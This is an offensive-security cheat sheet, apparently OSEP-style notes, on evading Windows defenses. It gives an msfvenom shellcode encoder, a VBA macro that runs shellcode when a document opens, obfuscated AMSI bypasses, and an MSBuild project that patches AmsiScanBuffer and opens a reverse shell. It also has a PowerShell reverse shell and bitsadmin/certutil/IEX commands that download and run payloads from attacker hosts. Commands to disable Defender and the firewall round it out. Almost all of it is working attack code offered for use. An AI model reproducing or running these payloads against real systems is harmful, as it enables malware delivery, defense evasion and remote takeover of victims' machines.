Bypass All The Things
Stuck?
look at this --> https://github.com/emanuelepicas/OSEP/tree/master/AV-Evasion
Encode payload with Byte Shifting
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
namespace EncryptVBA
{
class Program
{
static void Main(string[] args)
{
// byte[] buff = ... from msfvenom command, just paste
// HERE
// msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.45.173 LPORT=8080 -f csharp
// -----
byte[] encoded = new byte[buff.Length];
for (int i = 0; i < buff.Length; i++)
{
encoded[i] = (byte)(((uint)buff[i] + 2) & 0xFF);
}
uint counter = 0;
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("{0:D},", b);
counter++;
if (counter % 50 == 0)
{
hex.AppendFormat(" _{0}", Environment.NewLine);
}
}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}
for quick compiling using C# use csc.exe:
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:C:\WIndows\Tasks\encodepayload.exe z:\encodepayload.cs
VBA Script decode payload with Byte Shifting
make sure you have this "(space)_" in the end of line in your shellcode array:

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Sub MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(EncodedPayloadPasteHere)
For i = 0 To UBound(buf)
buf(i) = buf(i) - 2
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
AMSI Bypass

always works.
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} )
more advanced
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]("{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
sometimes problem with CLM
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils').GetField('ams'+iInitFailed','NonPublic,Static').SetValue($null,$true)
or if it doesn't works, save the powershell command in to amsi.txt
then execute it directly into memory with IEX:
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX
Stuck with AMSI? try this -> https://amsi.fail/
CLM Bypass
CLM is refering to Constrained Language Mode.

Using FullBypass.csproj
Make sure you have been migrate to exporer or edge with meterpreter to make shell stable.
Also you can use process injection.
Because of the build can't run in native reverse shell.
Check with this:
$ExecutionContext.SessionState.LanguageMode
# ConstrainedLanguage (this is bad for running powershell script)
# FullLanguage (this is good for us)
save file as FullBypass.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Bypass">
<FullBypass />
</Target>
<UsingTask
TaskName="FullBypass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.ComponentModel;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
public class FullBypass : Task, ITask
{
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint floldProtect);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint dwSize, out int lpNumberOfBytesWritten);
public static int BypassAMSI()
{
Console.WriteLine("Author: Shelldon");
Console.WriteLine("github: github.com/Sh3lldon");
Console.WriteLine("!!!! Please do not use in unethical hacking and follow all rules and regulations of laws!!!!");
Process[] processes = Process.GetProcessesByName("powershell");
if (processes.Length != 0)
{
Console.WriteLine("[+] Found " + processes.Length +" powershell processes\n");
}
else
{
Console.WriteLine("[-] Powershell process does not exist");
Console.WriteLine("Please create powershell process");
System.Environment.Exit(1);
}
int id = 0;
bool res = false;
for (int l = 0; l < processes.Length; l++)
{
id++;
Console.WriteLine("#" + id);
IntPtr hHandle = OpenProcess(0x001F0FFF, false, processes[l].Id);
IntPtr baseAddress = IntPtr.Zero;
IntPtr amsiScanBuffer = IntPtr.Zero;
int moduleSize = 0;
Console.WriteLine("[+] Powershell process id: " + processes[l].Id +" & handle: " + hHandle);
foreach (ProcessModule processModule in processes[l].Modules)
{
if (processModule.ModuleName == "amsi.dll")
{
Console.WriteLine("[+] Base address of amsi.dll: " + "0x" + processModule.BaseAddress.ToString("X"));
baseAddress = processModule.BaseAddress;
moduleSize = processModule.ModuleMemorySize;
Console.WriteLine("[+] Size of the module: 0x" + moduleSize.ToString("X"));
}
}
byte[] ret = new byte[32];
// First 32 bytes of AmsiScanBuffer function
byte[] fewBytes = new byte[32] { 0x4c, 0x8b, 0xdc, 0x49, 0x89, 0x5b, 0x08, 0x49, 0x89, 0x6b, 0x10, 0x49, 0x89, 0x73, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x70, 0x4d, 0x8b, 0xf9, 0x41, 0x8b, 0xf8, 0x48, 0x8b };
IntPtr outt;
bool addrScanBuffer = false;
int count = 0;
for (int i = 0; i <= moduleSize; i += fewBytes.Length)
{
ReadProcessMemory(hHandle, baseAddress + i, ret, fewBytes.Length, out outt);
if (addrScanBuffer == true)
{
break;
}
for (int j = 0; j < fewBytes.Length; j++)
{
if (count == fewBytes.Length - 1)
{
amsiScanBuffer = baseAddress + i;
Console.WriteLine("[+] Found AmsiScanBuffer function: 0x" + amsiScanBuffer.ToString("X"));
res = false;
addrScanBuffer = true;
break;
}
if (fewBytes[j] == ret[j])
{
count++;
}
else if (fewBytes[j] != ret[j])
{
count = 0;
break;
}
}
}
if (count != fewBytes.Length - 1)
{
Console.WriteLine("[-] Cannot find need bytes of AmsiScanBuffer function");
Console.WriteLine("Maybe you have already hijacked memory :)\n----------------------------------------------------------\n");
res = true;
}
if (res)
{
continue;
}
uint lpflOldProtect;
if (VirtualProtectEx(hHandle, baseAddress, (uint)0x1000, 0x40, out lpflOldProtect))
{
Console.WriteLine("[+] Successfully changed memory protection");
}
else
{
Console.WriteLine("[-] Changing memory protection failed");
}
byte[] hijack = new byte[3] { 0x31, 0xff, 0x90 };
int numberOfBytesWritten = 0;
if (WriteProcessMemory(hHandle, amsiScanBuffer + 0x1b, hijack, (uint)hijack.Length, out numberOfBytesWritten))
{
Console.WriteLine("[+] Successfully hijacked\n----------------------------------------------------------\n");File.WriteAllText("C:\\Windows\\Tasks\\test.txt", "[+] Successfully hijacked\n----------------------------------------------------------\n");
}
else
{
Console.WriteLine("[-] Hijacking failed\n----------------------------------------------------------\n");
}
}
return 0;
}
public override bool Execute()
{
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
Console.WriteLine(BypassAMSI());
Console.Write("[*] Attacker IP: ");
string ip = Console.ReadLine();
Console.Write("[*] Attacker port: ");
string port = Console.ReadLine();
//Change IP and PORT
string revShellcommand = @"$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
try
{
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
}
catch
{
$error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
$sendback2 = ""ERROR: "" + $error[0].ToString() + ""`n`n"" + ""PS "" + (pwd).Path + '> ';
}
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close();";
revShellcommand = revShellcommand.Replace("IP", ip).Replace("PORT", port);
ps.AddScript(revShellcommand);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
or download from github:
git clone https://github.com/Sh3lldon/FullBypass.git
Download this file, and upload it into the windows victim machine
curl http://192.168.x.x/FullBypass.csproj -o C:\Windows\Tasks\FullBypass.csproj
Then run this command
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\FullBypass.csproj
Using Compiled C# - Runspaces powershell
compile the project with visualstudio, then convert it to base64 with certutil in the windows
certutil -encode "\\192.168.56.106\visualstudio\AppLocker Bypass PowerShell Runspace\bin\x64\Release\AppLocker Bypass PowerShell Runspace.exe" \\192.168.56.106\visualstudio\PSRunspace-InvokeRun-certutilCoded.txt
setup python simple shell including this file:
PSRunspace-InvokeRun-certutilCoded.txt
drop.ps1 same as code below:
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.106',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
then listen the nc:
sudo rlwrap nc -lvnp 443
run this code in victim machine:
bitsadmin /Transfer theJob http://192.168.56.106:80/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
Bypass AppLocker + CLM
file.txt should be encoded with base64 windows mechanism
bitsadmin /Transfer jobFreelance http://10.10.x.y/file.txt C:\windows\tasks\file.txt && certutil -decode C:\windows\tasks\file.txt C:\windows\tasks\bypass.exe && del C:\windows\tasks\file.txt && C:\Windows\Tasks\bypass.exe
We also able to change the last command to other bypass mechanism. ex: installutil.exe
Using InstallUtil.exe
https://github.com/calebstewart/bypass-clm
Amsi + CLM Bypass
run this with msbuild.exe:
don't forget to edit the powershell payload

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\pwn.csproj
reference: https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
Run directly in the Memory
powershell to memory
To bypass AV.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')
exe to memory
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.x.y/Rubeus.exe')
run the exe in memory
$assemb = [System.Reflection.Assembly]::Load($data)
call the function directly because it's global function
[Rubeus.Program]::Main("s4u /user:xxx$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/file_01 /ptt".Split())
Disable Windows Defender
Require Local Admin and need to execute as impacket-psexec or psexec.exe
impacket-psexec needs smb service / port 445
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
Disable FIrewall
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
NetSh Advfirewall set allprofiles state off
More Reference
Last updated